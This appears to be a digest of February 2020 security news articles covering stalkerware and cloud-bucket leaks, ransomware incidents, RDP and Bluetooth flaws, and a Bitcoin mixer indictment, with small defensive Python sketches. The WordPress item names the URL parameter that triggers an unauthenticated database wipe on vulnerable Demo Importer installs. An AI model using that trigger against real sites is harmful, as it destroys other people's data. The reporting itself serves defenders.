Repairs & Upgrades

February 24, 2020 »

KidsGuard stalkerware leaks data on secretly surveilled victims

By Lisa Vaas


What an inappropriate name. It should be called KidsStalk-N-Dox, given that the makers of this consumer-grade stalkerware left a server open and unprotected, regurgitating the private data it slurped up from thousands of victims’ devices after a parent or other surveillance-happy person stealthily installed it.

The spyware app’s unprotected Alibaba cloud storage bucket was found by Till Kottmann. He’s a developer who reverse-engineers apps to see how they tick (or leak, in this case). Kottmann shared a copy of the Android version of KidsGuard with TechCrunch, which first reported on the data breach on Thursday.

Kottmann’s findings amount to “Goodness, Grandma, what enormous bites you take out of victims’ privacy with those big, keyloggy teeth of yours.”

this is sick

Till Kottmann (@deletescape) February 16, 2020

KidsGuard comes from a company called ClevGuard that promises that its “excellent products” will deliver “all the information” from a targeted device, including real-time location, text messages, browser history, photos, videos, recordings of phone calls, keylogger data for every keystroke entered and the app where it came from, and all the data from all the social apps – hopping over the end-to-end encryption of, for example, WhatsApp.


Google purges 600 Android apps for “disruptive” pop-up ads

By Lisa Vaas

You know those ads that obscure your whole screen when you’re trying to make a phone call, unlock your device or use your phone’s GPS?

Technically, they’re called disruptive or out-of-app ads, and they maddeningly pop up outside of the app that hosts them, sometimes causing users to mistakenly click them, thereby frustrating users and wasting advertisers’ money.

On Thursday, Google kicked nearly 600 of the offending apps off its Play store and banned them from its ad monetization platforms, Google AdMob and Google Ad Manager, for violating its disruptive ads policy and disallowed interstitial policy.

Disruptive ads are those that come at you in unexpected ways, including by getting in the way of a device’s functions. While they do occur in-app, Google has recently seen a rise in what it calls “out-of-context ads” – those created by malicious developers who program them to pop up when the user isn’t actually active in their app.

Per Bjorke, Google’s senior product manager for ad traffic quality, said in a Google security blog post that the developers behind these apps keep coming up with ways to deploy them and mask what they’re up to. But Google has been working on technology to detect them, and it’s led to Thursday’s purge:

We recently developed an innovative machine-learning based approach to detect when apps show out-of-context ads, which led to the enforcement we’re announcing today.

Also on Thursday, Google detailed a three-step plan to keep the Play Store and Android ad ecosystem from getting polluted by disruptive ads and other challenges.

One of those steps is doubling down on protecting advertisers from invalid traffic like that coming from disruptive, out-of-app ads. Sweeping the Play store of such apps on Thursday is one example, Google said, given that its investigations are ongoing and it plans to keep taking action against this kind of abuse.


Apple chops Safari’s TLS certificate validity down to one year

By John E Dunn

Though barely noticed by web users, the life expectancy of SSL/TLS certificates has dropped dramatically over the last decade.

Just over a decade ago, domain registrars were selling SSL/TLS certificates – the foundation of HTTPS authentication – that were valid for between 8 and 10 years.

In 2011, a new body called the Certification Authority Browser Forum (CA/Browser Forum), which included all the big browser makers, decided this was too long and imposed a limit of five years.

Then, in 2015 the time limit was dropped to three years, followed by a further drop in 2018 to only two years.

How low could this go?

This week, we learned that the latest answer is one year, or 398 days including the renewal grace period, a change that will apply from 1 September 2020.

What makes this new limit noteworthy, however, is that it was reportedly announced at a CA/Browser Forum meeting by a single member, Apple, in relation to one browser, Safari.

Although not yet officially confirmed, it’s a bold move that presumably prefigures similar announcements by other big browser makers, especially Google, which has assiduously promoted the idea of a one-year limit in recent CA/Browser Forum ballots.

That browser makers were voted down might explain why Apple has decided to enforce the change unilaterally, apparently against the wishes of the Certificate Authorities (CAs) which issue certificates as a business.

The browser makers are adamant that reducing validity is good for security because it reduces the time period in which compromised or bogus certificates can be exploited.

In theory, it also makes it less likely that in future, certificates using retired encryption (certificates based on SHA-1 being a prime example) will be able to soldier on when everyone knows they are vulnerable.
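The reported rule is mechanical enough to sketch in code. The snippet below is an illustrative check, not Apple's implementation: it assumes the two figures from the announcement (a 398-day ceiling, applied to certificates issued on or after 1 September 2020) and flags any certificate whose validity window exceeds them.

```python
from datetime import datetime, timedelta

# Figures from the reported announcement: 398 days including the renewal
# grace period, for certificates issued on or after 1 September 2020.
MAX_LIFETIME = timedelta(days=398)
CUTOFF = datetime(2020, 9, 1)

def exceeds_new_limit(not_before, not_after):
    """Return True if a certificate issued after the cutoff would fall
    foul of the reported 398-day rule. (Illustrative sketch only.)"""
    if not_before < CUTOFF:
        return False  # certificates issued earlier are unaffected
    return (not_after - not_before) > MAX_LIFETIME

# A hypothetical two-year certificate issued after the cutoff fails:
print(exceeds_new_limit(datetime(2020, 10, 1), datetime(2022, 10, 1)))  # True
```

A certificate issued before the cutoff keeps whatever lifetime it was sold with, which is why the change only bites gradually as old certificates expire.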


The Amazon Prime phishing attack that wasn’t…

By Paul Ducklin

Earlier this week, we received a moderately believable Amazon Prime phish via email.

The scam had an Account Locked subject line, with a warning that we wouldn’t be able to buy or sell anything via Amazon’s services until we verified our account.

To add a bit more fear and urgency, the crooks went on to warn us that if we didn’t complete the verification process within 24 hours, then our account would be deactivated, not merely suspended.

The “good” news, of course, is that verifying our account was as easy as clicking a link in the email:

Your Prime Membership Account Has Been Suspended Due To The Following Problems Below:

Invalid Card Number

Your Billing Address Does Not Match Our Records

Unverified Email Address

You will not be able to Buy and Sell on amazon until you have click the link below to confirm your account details before 24hrs of receiving this message.

We will be forced to deactivate your account automatically if you do not verify your identity.

We don’t think that Naked Security readers would fall for this one, for several reasons.


Data of 10.6m MGM hotel guests posted for sale on Dark Web forum

By Lisa Vaas

The personal data of 10,683,188 MGM hotel guests that leaked sometime in or before 2017 was posted for sale on the Dark Web this week, ZDNet reports.

It doesn’t matter that the data isn’t freshly baked: it’s still edible. ZDNet called hotel guests whose details were included in the data dump and found that, while some of the phone numbers had been disconnected, many were still valid, as “the right person answered the phone.”

The data was first spotted by an Israeli security researcher calling themselves Under the Breach, who claims to have “deep relations” with various threat actors that give them “pre-breach information on many publicly traded companies.”

Under the Breach says they spotted some Vegas-big names among the leaked guest records, including Twitter CEO Jack Dorsey, pop star Justin Bieber, and government officials from the Department of Homeland Security (DHS) and the Transportation Security Administration (TSA).

Under the Breach came across the leaked files on an online forum commonly used by hackers, they told Business Insider. The researcher said that they’d cross-referenced the information with publicly available data and emails that had been exposed in previous breaches.

A spokesperson for MGM Resorts confirmed the security breach, saying that the data is old. The dump included full names, addresses, phone numbers, emails and birthdays, but MGM says that no payment information was compromised. The hotel chain hasn’t confirmed the identity of any of the affected guests; nor has Twitter commented on whether or not Dorsey’s information was involved.

ZDNet confirmed the authenticity of the data on Wednesday. None of the hotel guests whom the news outlet contacted had stayed at the hotel more recently than 2017. But regardless of how long ago the initial breach happened, the personally identifiable information (PII) is still valuable for use in spearphishing campaigns or in SIM-swap attacks, as Under the Breach told ZDNet.


Adobe fixes critical flaws in Media Encoder and After Effects

By John E Dunn

After fixing a fat pile of critical security flaws as part of last week’s Patch Tuesday update, Adobe has come back with two more that need urgent attention.

This is what’s called an out-of-band update, meaning that the vulnerability is considered too risky, or too likely to be exploited, to leave until the next scheduled update.

The first is in the Windows and macOS versions of the After Effects graphics software and affects anyone running version 16.1.2 and earlier.

Identified as CVE-2020-3765, the flaw was reported to Adobe only days ago, and the company offers little detail on the vulnerability itself beyond stating that the update:

Resolves a critical out-of-bounds write vulnerability that could lead to arbitrary code execution in the context of the current user.

Assuming that this flaw can be triggered merely by opening a booby-trapped data file – for example, by opening an email attachment or downloading a file from a poisoned website – you should apply the patch as soon as you can.

The second is also an out-of-bounds write weakness, this time in Adobe Media Encoder, affecting Windows and macOS versions 14.02. Identified as CVE-2020-3764, it likewise leads to code execution in the context of the current user.

There is no evidence that either of these flaws is being exploited in the wild, but you never know, hence the need to patch now.


ISS World “malware attack” leaves employees offline

By Paul Ducklin

Global facilities company ISS World, headquartered in Denmark, has shuttered most of its computer systems worldwide after suffering what it describes as a “security incident impacting parts of the IT environment.”

The company’s website currently shows a holding page, with no clickable links on it:

On 17 February 2020, ISS was the target of a malware attack. As a precautionary measure and as part of our standard operating procedure, we immediately disabled access to shared IT services across our sites and countries, which ensured the isolation of the incident.

The root cause has been identified and we are working with forensic experts, our hosting provider and a special external task force to gradually restore our IT systems. Certain systems have already been restored. There is no indication that any customer data has been compromised.

Some media outlets – for example, the BBC – have mentioned ransomware prominently in their coverage of the issue, perhaps because of the suddenness of the story, but at the moment we simply don’t know what sort of malware was involved.

As you can imagine, facilities companies that provide services such as cleaning and catering rely heavily on IT systems for managing their operations.

But one silver lining for ISS World is that many, perhaps most, of its staff don’t rely on computers to carry out their hour-by-hour work, and most staff work on customer sites:

The nature of our business is to deliver services on customer sites mainly through our people and as such we continue our service delivery to customers while implementing our business continuity plans. Our priority is to ensure limited or no disruption while we fully restore all systems.

Nevertheless, a report in the UK claims that 43,000 staff worldwide, including 4000 in the UK, don’t have access to email, a serious operational blow to any modern business.

ISS World has promised, via its one-page, static website, that it is “currently estimating when IT systems will be fully restored and are assessing any potential financial impact”, and that it will “provide a further update when we have significant, additional information.”


Ransomware attack forces 2-day shutdown of natural gas pipeline

By Lisa Vaas

The US Department of Homeland Security (DHS) on Tuesday said that an infection by an unidentified ransomware strain forced the shutdown of a natural-gas pipeline for two days.

Fortunately, nothing blew up. The attacker never got control of the facility’s operations: the human-machine interfaces (HMIs) used to read and control those operations were successfully yanked offline, and a geographically separate central control site was able to keep an eye on things, though it wasn’t instrumental in controlling them.

Where this all went down is a mystery.

The alert, issued by DHS’s Cybersecurity and Infrastructure Security Agency (CISA), didn’t say where the affected natural gas compression facility is located. It instead stuck to summarizing the attack and provided technical guidance for other critical infrastructure operators so they can gird themselves against similar attacks.

The alert did get fairly specific with the infection vector, though: whoever the attacker was, they launched a successful spearphishing attack, which enabled them to gain initial access to the facility’s IT network before pivoting to its operational technology (OT) network.

OT networks are where hardware and software for monitoring and/or controlling physical devices, processes and events reside. Some examples are SCADA industrial control systems, programmable logic controllers (PLCs), and HMIs.

After the attacker(s) got their hands on both the IT and OT networks, they deployed what CISA called “commodity” ransomware, encrypting data on both networks. Staff lost access to HMIs, data historians and polling servers. Data historians – sometimes referred to as process or operational historians – are used in several industries, and they do what you might expect: record and retrieve production and process data by time and store the information in a time series database.
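The "record and retrieve by time" job a data historian does can be sketched as a tiny time-series store. Everything below is invented for illustration (tag names, readings, the class itself); real historians add compression, interpolation and highly available storage on top of this core idea.

```python
import bisect
from datetime import datetime

class MiniHistorian:
    """A toy process historian: append timestamped readings per tag,
    retrieve them by time range. Illustrative sketch only."""
    def __init__(self):
        self._series = {}  # tag name -> sorted list of (timestamp, value)

    def record(self, tag, ts, value):
        # Keep each tag's points sorted by time as they arrive.
        bisect.insort(self._series.setdefault(tag, []), (ts, value))

    def query(self, tag, start, end):
        # Binary-search the sorted points for the [start, end] window.
        points = self._series.get(tag, [])
        lo = bisect.bisect_left(points, (start,))
        hi = bisect.bisect_right(points, (end, float("inf")))
        return points[lo:hi]

h = MiniHistorian()
h.record("compressor.psi", datetime(2020, 2, 18, 9, 0), 842)
h.record("compressor.psi", datetime(2020, 2, 18, 9, 5), 847)
print(h.query("compressor.psi",
              datetime(2020, 2, 18, 9, 0), datetime(2020, 2, 18, 9, 10)))
```

Encrypting a store like this is exactly why the ransomware hurt: staff lose the time-indexed view of what the plant was doing and when.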


Nearly half of hospital Windows systems still vulnerable to RDP bugs

By Danny Bradbury

Almost half of connected hospital devices are still exposed to the wormable BlueKeep Windows flaw nearly a year after it was announced, according to a report released this week.

The report, called 2020 Vision: A Review of Major IT & Cyber Security Issues Affecting Healthcare, comes from CyberMDX, which provides cybersecurity systems for hospitals.

It says that 22% of a typical hospital’s connected devices are exposed to BlueKeep. Among Windows devices specifically, the proportion that are vulnerable is far higher, at 45%.

CyberMDX gathers these kinds of metrics via its own platform, which tells it about the machines it’s protecting in the field. It told us that it has analyzed a little over a million data points collected from machines across hundreds of facilities.

The BlueKeep bug, first reported in May 2019, is wormable, meaning that an attacker can trigger it without human interaction. An exploit could spread by sending malicious packets via the Remote Desktop Protocol (RDP) to Microsoft’s Remote Desktop Service (RDS).

It affected Windows 7 and Windows Server 2008, and Microsoft issued patches when it first reported the bug. However, as with many patches, companies have taken a long time to apply them, and there is a ‘long tail’ of machines still online and vulnerable.

The problem doesn’t just lie with BlueKeep. According to the CyberMDX report, 25% of connected devices in hospitals are also exposed to another flaw: DejaBlue.

News of DejaBlue surfaced in August when Microsoft patched another two RDP bugs, this time affecting versions of Windows up to and including Windows 10. These bugs, CVE-2019-1181 and CVE-2019-1182, are also wormable.

Like BlueKeep, these bugs were exploitable using a maliciously crafted RDP message. The saving grace for some users is Network Level Authentication (NLA), which, when turned on, requires authentication before an attacker can trigger an exploit. However, an attacker with valid credentials could still mount the attack.
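Why NLA helps can be shown with a conceptual sketch: with it off, the large (and historically bug-prone) message-parsing surface runs for anyone who connects; with it on, only authenticated callers ever reach that code. This is not RDP code, and every name below is invented for illustration.

```python
# Conceptual analogue of NLA: authenticate before parsing untrusted input.
VALID_TOKENS = {"alice-session-token"}  # hypothetical credential store

def parse_session_message(payload):
    # Stands in for the complex protocol parsing where flaws like
    # BlueKeep and DejaBlue live.
    return payload.decode("utf-8", errors="replace")

def handle_connection(token, payload, nla_enabled):
    if nla_enabled and token not in VALID_TOKENS:
        # Attacker's crafted message is dropped before it reaches the parser.
        return "rejected before parsing"
    return "parsed: " + parse_session_message(payload)

print(handle_connection(None, b"crafted bytes", nla_enabled=True))   # rejected before parsing
print(handle_connection(None, b"crafted bytes", nla_enabled=False))  # parsed: crafted bytes
```

The sketch also shows NLA's limit, as noted above: a caller holding valid credentials still reaches the vulnerable parsing code.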


February 19, 2020 »

Private photos leaked by PhotoSquared’s unsecured cloud storage

By Lisa Vaas

Are PhotoSquared users’ private photos safe? Likely not – no thanks to the leaky app they dribbled out of. After coming across thousands of photos seeping out of an unsecured S3 storage bucket belonging to the photo app PhotoSquared, security researchers at vpnMentor blurred a few.

They also blurred a sample from a host of other personally identifiable information (PII) they came across during their ongoing web mapping project, which has led to the discovery of a steady stream of databases that have lacked even the most basic of security measures.

In this case, as they wrote up in a report published this week, the researchers came across photos uploaded to the app for editing and printing; PDF orders and receipts; US Postal Service shipping labels for delivery of printed photos; and users’ full names, home/delivery addresses and the order value in USD.

PhotoSquared, a US-based app available on iOS and Android, is small but popular: it has over 100,000 customer entries just in the database that the researchers stumbled upon.

Customer impact and legal ramifications

vpnMentor suggested that PhotoSquared might find itself in legal hot water over this breach. vpnMentor’s Noam Rotem and Ran Locar note that PhotoSquared’s failure to lock down its cloud storage has put customers at risk of identity theft, financial or credit card fraud, malware attacks, and phishing campaigns: the USPS and PhotoSquared postage data arms phishers with exactly the PII they need to sound that much more convincing.
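Misconfigurations like this one are what AWS's S3 "Block Public Access" settings exist to prevent. As a sketch, the function below builds the four-setting configuration payload; the setting names are AWS's own, but the bucket owner would normally apply the dict via boto3's `put_public_access_block` call, which is omitted here to keep the snippet dependency-free.

```python
import json

def public_access_block(block_everything=True):
    """Build an S3 PublicAccessBlockConfiguration payload that locks a
    bucket down. Sketch only: applying it (e.g. via boto3's
    put_public_access_block) is not shown."""
    return {
        "BlockPublicAcls": block_everything,        # refuse new public ACLs
        "IgnorePublicAcls": block_everything,       # neutralize existing public ACLs
        "BlockPublicPolicy": block_everything,      # refuse public bucket policies
        "RestrictPublicBuckets": block_everything,  # cut off public cross-account access
    }

print(json.dumps(public_access_block(), indent=2))
```

With all four flags set, a bucket like PhotoSquared's cannot be made world-readable by an accidental ACL or policy change.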


Facebook asks to be regulated kinda like a newspaper, kinda like telco

By Lisa Vaas

The EU has been itching to regulate the internet, and that’s where Facebook has been this week: in Germany, asking to be regulated, but in a new, bespoke manner.

In fact, CEO Mark Zuckerberg is in Brussels right on time for the European Commission’s release of its manifesto on regulating AI – a manifesto due to be published on Wednesday that’s likely going to include risk-based rules wrapped around AI.

Don’t regulate us like the telco-as-dumb-pipe model, Zuckerberg proposed on Saturday, even though that’s how he once wanted us all to view the platform: as just a technology platform that dished up trash without actually being responsible for creating it.

No, not like a telco, but not like the newspaper model, either, he said.

Nobody ever really swallowed what Facebook once offered as a magic pill to try to ward off culpability for what it publishes – as in, that “we’re just a technology platform” mantra. Facebook gave up trying to hide behind that one long ago, somewhere amongst the outrage sparked by extremist content, fake news and misleading political advertising.

So now, Facebook has taken a different tack. During a Q&A session at the Munich Security Conference on Saturday, Zuckerberg admitted that Facebook isn’t the passive set of telco pipes he once insisted it was, but nor is it like a regular media outlet that produces news. Rather, it’s a hybrid, he said, and should be treated as such.

Reuters quoted Zuckerberg’s remarks as he spoke to global leaders and security chiefs, suggesting that regulators treat Facebook like something between a newspaper and a telco:

I do think that there should be regulation on harmful content …there’s a question about which framework you use for this.

Right now there are two frameworks that I think people have for existing industries – there’s like newspapers and existing media, and then there’s the telco-type model, which is ‘the data just flows through you’, but you’re not going to hold a telco responsible if someone says something harmful on a phone line.

I actually think where we should be is somewhere in between.

Zuckerberg says that following the 2016 US presidential election tampering, Facebook has gotten “pretty successful” at sniffing out not just hacking, but coordinated information campaigns that are increasingly going to be a part of the landscape. One piece of that is building AI that can identify fake accounts and networks of accounts that aren’t behaving the way people would, he said.

In the past year, Facebook took down around 50 coordinated information operations, including in the last couple of weeks, he said. In October 2019, it pulled fake news networks linked to Russia and Iran.


WordPress plugin hole could have allowed attackers to wipe websites

By Danny Bradbury

A WordPress plugin with over 100,000 active installations had a hole which could have allowed unauthorized attackers to wipe its users’ blogs clean, it emerged this week.

ThemeGrill is a WordPress theme developer that publishes its own Demo Importer plugin. As the name suggests, it imports demo content, widgets, and theme settings. By importing this data with a single button click, it makes demo content easy for non-technical users to import, giving them fully configured themes populated with example posts.

Unfortunately, it also makes it possible for unauthenticated users to wipe a WordPress site’s entire database to its default state and then log in as admin, according to a post from web application security vendor WebARX.

The vulnerability has existed for roughly three years in versions 1.3.4 through 1.6.1, said the security company, and affects sites using the plugin that also have a ThemeGrill theme installed and activated.

The problem lies with an authentication bug in code introduced by class-demo-importer.php, a PHP file that loads a lot of the Demo Importer functionality. That file adds a code hook into admin_init, which is code that runs on any admin page.

The hook added into admin_init enables someone who isn’t logged into the site to trigger a database reset, dropping all the tables. All that’s needed to trigger the wipe is the inclusion of a do_reset_wordpress parameter in the URL on any admin-based WordPress page.

Unfortunately for site admins, one of those admin-based WordPress pages is /wp-admin/admin-ajax.php. This page, which loads the WordPress Core, doesn’t need a user to be authenticated when it loads, WebARX explains.
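The bug boils down to a destructive handler reachable by a bare URL parameter, with no login, capability or nonce check in between. WordPress itself is PHP, so the sketch below is only a hypothetical analogue of the missing guard, with every name invented for illustration.

```python
import hmac
import secrets

NONCES = {}  # user -> expected one-time token (stands in for WP nonces)

def issue_nonce(user):
    """Hand a logged-in user a one-time token to attach to the request."""
    NONCES[user] = secrets.token_hex(16)
    return NONCES[user]

def handle_request(params, user=None, is_admin=False):
    if "do_reset_wordpress" not in params:
        return "ok"
    # The vulnerable plugin effectively skipped straight to the reset here.
    if user is None or not is_admin:
        return "forbidden: authentication and admin capability required"
    expected = NONCES.get(user)
    if not expected or not hmac.compare_digest(params.get("nonce", ""), expected):
        return "forbidden: missing or stale nonce (blocks CSRF)"
    return "database reset"

# An anonymous visitor supplying only the magic parameter gets nowhere:
print(handle_request({"do_reset_wordpress": "1"}))
```

The three checks map onto WordPress's own conventions: a login check, a capability check, and a nonce check, any one of which would have stopped the drive-by wipe described above.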


OpenSSH eases admin hassles with FIDO U2F token support

By John E Dunn

OpenSSH version 8.2 is out and the big news is that the world’s most popular remote management software now supports authentication using any FIDO (Fast Identity Online) U2F hardware token.

SSH offers a range of advanced security features but it is still vulnerable to brute force attacks that try large numbers of passphrases until they hit upon the right one.

One way to counter this is passwordless login using cryptographic keys, but these are normally stored on a local drive or in the cloud. That makes them vulnerable to misuse and creates some management overhead.

A more secure alternative is to put them on a USB or NFC hardware token such as a YubiKey that ties a generated private key to that device. This means that authentication can’t happen without the token being present as well as requiring a physical finger tap by an admin.

However, until now, getting U2F tokens to work with SSH has required support for the Personal Identity Verification (PIV) card interface, which only the most recent and expensive tokens offer.


February 18, 2020 »

AI filter launched to block Twitter cyberflashing

By John E Dunn

It seems strange to report, yet a small but determined group of Twitter users think it is a good idea to direct message (DM) pictures of male genitals to complete strangers.

Does this sound a bit like street flashing harassment in digital form?

It did to developer Kelsey Bressler after she received such an unsolicited image as a DM via Twitter last August. She later told the BBC:

You’re not giving them a chance to consent, you are forcing the image on them, and that is never okay.

Instead of shrugging it off, she and a friend had the idea of using AI pattern recognition to screen the pictures out before they were seen. But that AI still needed a set of – ahem – images to train itself on, which Bressler requested via Twitter.

Bressler has reportedly received over 4,000 pictures in response – enough to train the system to a state where it has just been released as a Safe DM service that anyone can sign up for.

Media site Buzzfeed tested Safe DM against a selection of images taken from Wikimedia Commons and found that it works well, albeit with a lag of a few minutes.

In tests, the filter blocked images of penises in a range of states, including in full-body shots, with condoms, and in drawings. It even blocked examples that looked like a penis without actually being one.


IOTA shuts down network temporarily to fight wallet hacker

By Danny Bradbury

Popular cryptocurrency IOTA has temporarily shut down its entire network after a hacker stole funds from ten of its highest-value users.

IOTA is a cryptocurrency that uses an alternative to the conventional blockchain technology seen in assets like Bitcoin. Called the Tangle, it’s a ‘blockless’ network that the development team created with vast connected networks of small-footprint connected machines (the internet of things) in mind. Its advantages include fast verification of transactions and no transaction fees. However, for this network to operate effectively, it needs a system called the Coordinator to protect the network when the transaction volume is low.

On Wednesday 12 February, IOTA published a status update, explaining:

Currently the Coordinator is halted until further notice to investigate reported issues with stolen funds. We ask you to keep the Trinity wallet closed for now until further notice.

In a series of further updates, the team explained that the problem lay in a third-party integration with the desktop version of Trinity, a wallet that the company released in July 2019. The vulnerability apparently allowed an attacker to steal users’ seeds – digital keys that provide access to the wallet’s funds. The IOTA team published an updated version on Sunday to fix the problem.

The attacker had hit ten people that the IOTA team said were high-value clients, and may have intended to work their way down to clients with fewer funds, it said.


Council returns to using pen and paper after cyberattack

By John E Dunn

Ten days after a suspected ransomware attack, residents of the English borough of Redcar and Cleveland must be starting to wonder when their Council’s IT systems will return.

The first public sign of trouble appeared on the morning of Saturday, February 8, when the following message appeared on the Council’s website:

The requested service is temporarily unavailable. It is either overloaded or under maintenance. Please try later.

The Council later confirmed that it had been hit with a cyberattack affecting its internal and external-facing IT systems, with the notable exception of property tax payments.

The Council is back to working from pen and paper and able to field only urgent emails and telephone enquiries. Council leader, Councilor Mary Lanigan, told the BBC:

Computers have been taken offline and systems are being rebuilt. We have a massive team here – including cyber-security experts – working around the clock flat out to get it fixed.

The Council hasn’t explained the nature of the cyberattack, but it’s quite possible that this is yet another ransomware attack of a type that has become a huge problem across the world. The UK’s National Cyber Security Centre (NCSC) has confirmed it is assisting the Council.

This is happening over and over again. In January, it was schools in California, in November it was a company managing 110 nursing homes in the US, and in September the city of New Bedford in Massachusetts – the latest in a long line of US cities hit by the plague of hijacking networks for money.


Sensitive plastic surgery images exposed online

By Danny Bradbury

Researchers at VPN advisory company vpnMentor have found yet another online data exposure caused by a misconfigured cloud database. This time, the culprit was the French plastic surgery technology company NextMotion.

Established in 2015, NextMotion sells digital photography and video devices for dermatology clinics, concentrating on images including those that document the effects of treatment. Its proprietary software includes facial analysis and augmented reality tools, and also documents treatment plans, digital consent forms, treatment reports, quotes, and invoices. It reports selling its services to over 170 clinics in 35 countries. It has received investments of €1.58m, a million of which it raised last year in a single round.

The images are the contentious part here. According to a team led by vpnMentor researchers Noam Rotem and Ran Locar, NextMotion’s compromised database contained sensitive images of thousands of plastic surgery patients, uploaded via its devices and software.

There were almost 900,000 images in an Amazon Web Services S3 bucket, showing patients’ faces along with the parts of their bodies that had been treated. These images were often highly sensitive, showing patients’ genitalia and other body parts.

The French company was quick to clarify what hadn’t been exposed. In a press release on its site, it said:

These media are stored in a specific database separated from the patients’ personal data database (names, birth dates, notes, etc) – only the media database was exposed, not the patients’ database.


February 17, 2020 »

Senator calls for dedicated US data protection agency

By Danny Bradbury

The US needs a data protection agency of its own, and Kirsten Gillibrand wants to be the one who makes it happen.

Gillibrand, the US senator for New York, released the call to action last week. She announced draft legislation known as the Data Protection Act on Thursday 13 February, a day after explaining her reasoning in a post on Medium. We need to do this to catch up, she said:

The United States is vastly behind other countries on this. Virtually every other advanced economy has established an independent agency to address data protection challenges, and many other challenges of the digital age.

At the moment, the US doesn’t have a single body dedicated to enforcing privacy rules. It’s a side-mission at the Federal Trade Commission (FTC), which is limited in its approach.

Under Section 5 of the FTC Act, it can’t issue fines for privacy violations immediately. Instead, it has to issue a consent decree (the violator has to agree that it won’t be naughty again) and it can only fine a company if it violates that decree. That’s why it didn’t fine Facebook for privacy infractions in 2011 but did levy a $5bn fine last year.

In any case, the FTC doesn’t just focus on privacy. Gillibrand wants a federal data agency dedicated to the task with three core missions.

The first would give Americans control over their own data by enforcing data protection rules. The key word here is ‘enforcing’ – it would be able to not just conduct investigations and share its findings, but to impose civil penalties. These would be capped at $1m for each day that an organization knowingly violates the Act. This money would go into a relief fund that the Agency would use to help compensate victims of data privacy violations.

The second mission would be to promote privacy innovations, including technologies that minimize the collection of personal data or eliminate it altogether. Under this mission, Gillibrand would also come down hard on service contracts that gave customers no choice but to give up their privacy. She also says that she’d protect against “pay for privacy” provisions in service contracts.


Police bust alleged operator of Bitcoin mixing service Helix

By Lisa Vaas

The guy who allegedly wanted to be the Dark Net’s “go-to” money launderer by acting as a “Bitcoin mixer” – soliciting cryptocurrency from crooks, slicing and dicing the coins, and then remixing them in an ultimately futile attempt to obscure their source – has been busted.

The US Department of Justice (DOJ) announced on Thursday that Larry Harmon, 36, of Akron, Ohio, has been indicted on three counts of allegedly running a Bitcoin mixer service called Helix from 2014 to 2017.

These services are also called Bitcoin tumblers, which is how Harmon allegedly referred to Helix in his sales pitch to the underworld. This is how the indictment summarizes Harmon’s alleged first post about his service in June 2014 – a pitch to convince criminals to pay him to hide their transactions from law enforcement:

Before launching Helix, HARMON posted online that Helix was designed to be a ‘bitcoin tumbler’ that ‘cleans’ bitcoins by providing customers with new bitcoins ‘which have never been to the darknet before.’

Harmon allegedly went on to promise that there was no way that law enforcement could tell which addresses are Helix addresses, given that the service uses new addresses for each transaction. His alleged “I’ll-scare-you-crooks-into-paying” follow-up advertising spiel:

No one has ever been arrested just through bitcoin taint, but it is possible and do you want to be the first? …Most markets use ‘Hot Wallets’, they put all their fees in these wallets. [Law enforcement] just needs to check the taints on these wallets to find all the addresses a market uses.

In short, “taints” are the trail left by bitcoins as they travel from wallet to wallet. Here’s a discussion about traceability from Stack Exchange.
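To picture what a “taint” trail looks like in practice, here’s a toy Python sketch (our own illustration, not anything from the indictment): it simply walks a transaction graph outwards from a known wallet, which is why naive mixing alone doesn’t break the trail.

```python
from collections import deque

def tainted_addresses(transfers, source):
    """Toy 'taint' walk: given (sender, receiver) transfer pairs,
    return every address reachable from the source wallet."""
    outgoing = {}
    for sender, receiver in transfers:
        outgoing.setdefault(sender, []).append(receiver)
    seen, queue = {source}, deque([source])
    while queue:
        addr = queue.popleft()
        for nxt in outgoing.get(addr, []):
            if nxt not in seen:
                seen.add(nxt)
                queue.append(nxt)
    return seen - {source}

# Hypothetical flow: market hot wallet -> mixer -> "fresh" address -> cashout
transfers = [("market_hot_wallet", "mixer_in"),
             ("mixer_in", "fresh_addr_1"),
             ("fresh_addr_1", "cashout")]
print(sorted(tainted_addresses(transfers, "market_hot_wallet")))
```

Because every coin movement is public on the blockchain, every hop stays reachable from the hot wallet – exactly the property Helix claimed, unsuccessfully, to defeat.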

Harmon’s Helix bitcoin mixer allegedly moved at least 354,468 bitcoin on behalf of customers: a sum that was valued at over $300 million at the time of the transactions and which is now worth about $3.6 billion. Most of those customers came in from Dark Net markets. Helix had partnered with AlphaBay – one of the largest Dark Net markets before law enforcement seized it in July 2017 – to provide bitcoin laundering for AlphaBay’s customers.


Bluetooth bugs – researchers find 10 “Sweyntooth” security holes

By Paul Ducklin

A trio of researchers from Singapore just published a paper detailing a number of security holes they discovered in Bluetooth chips from several different vendors.

The good news is that they disclosed the holes responsibly back in 2019 and waited 90 days – a sort-of industry standard period popularized by Google’s Project Zero team – before releasing the paper.

The bad news is that not all of the affected devices have received patches yet, and even for chips where the vendor has provided new firmware, it’s hard to be sure:

  • Which products out in the market use those chips.
  • Which products that could have been patched have actually received updates.
  • Which products might be affected but don’t support patching at all.

The researchers name seven different Bluetooth chip manufacturers as having buggy chips, though they insist that their list is “By no means […] exhaustive in terms of being affected.”

We assume they’re saying that out of a sense of fairness to the vendors they did name, which just happen to be the major Bluetooth chip makers whose chips appeared in the products they tried.

In other words, they’re not claiming that they tested a long list of chips and found all the other vendors to be safer, or suggesting that by avoiding the named vendors you’ll immediately be more secure.

The researchers also say that they were quickly able to find about 480 different products using the affected Bluetooth chips they’d identified, including fitness trackers, digital locks, remotely controllable plugs and more.


Google pulls 500 malicious Chrome extensions after researcher tip-off

By John E Dunn

Google has abruptly pulled over 500 Chrome extensions from its Web Store that researchers discovered were stealing browsing data and executing click fraud and malvertising after installing themselves on the computers of millions of users.

Depending on which way you look at it, that’s either a good result because they’re no longer free to infect users, or an example of how easy it is for malicious extensions to sneak onto the Web Store and stay there for years without Google noticing.

That they were noticed at all is thanks to researcher Jamila Kaya, who used Duo Security’s CRXcavator tool to spot a handful of extensions that seemed suspicious, mostly themed around marketing and advertising.

Spotting dodgy extensions was only the start – she still had to connect them to one another to uncover recurring patterns that might highlight other offenders.

The first giveaway was that the extension code often looked like copycats of one another despite small changes to the names of internal functions designed to obscure this.
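Normalizing away renamed identifiers is a standard trick for spotting that kind of copycat. Here’s a toy Python sketch (our own illustration, not Kaya’s actual method) that replaces every non-keyword name with a positional placeholder, so two copies that differ only in renamed functions fingerprint identically:

```python
import re

IDENT = re.compile(r"\b[A-Za-z_]\w*\b")
KEYWORDS = {"function", "var", "return", "if", "else", "for", "while"}

def fingerprint(src):
    """Replace each non-keyword identifier with a placeholder based on
    first-appearance order, so superficial renames cancel out."""
    names = {}
    def sub(match):
        word = match.group(0)
        if word in KEYWORDS:
            return word
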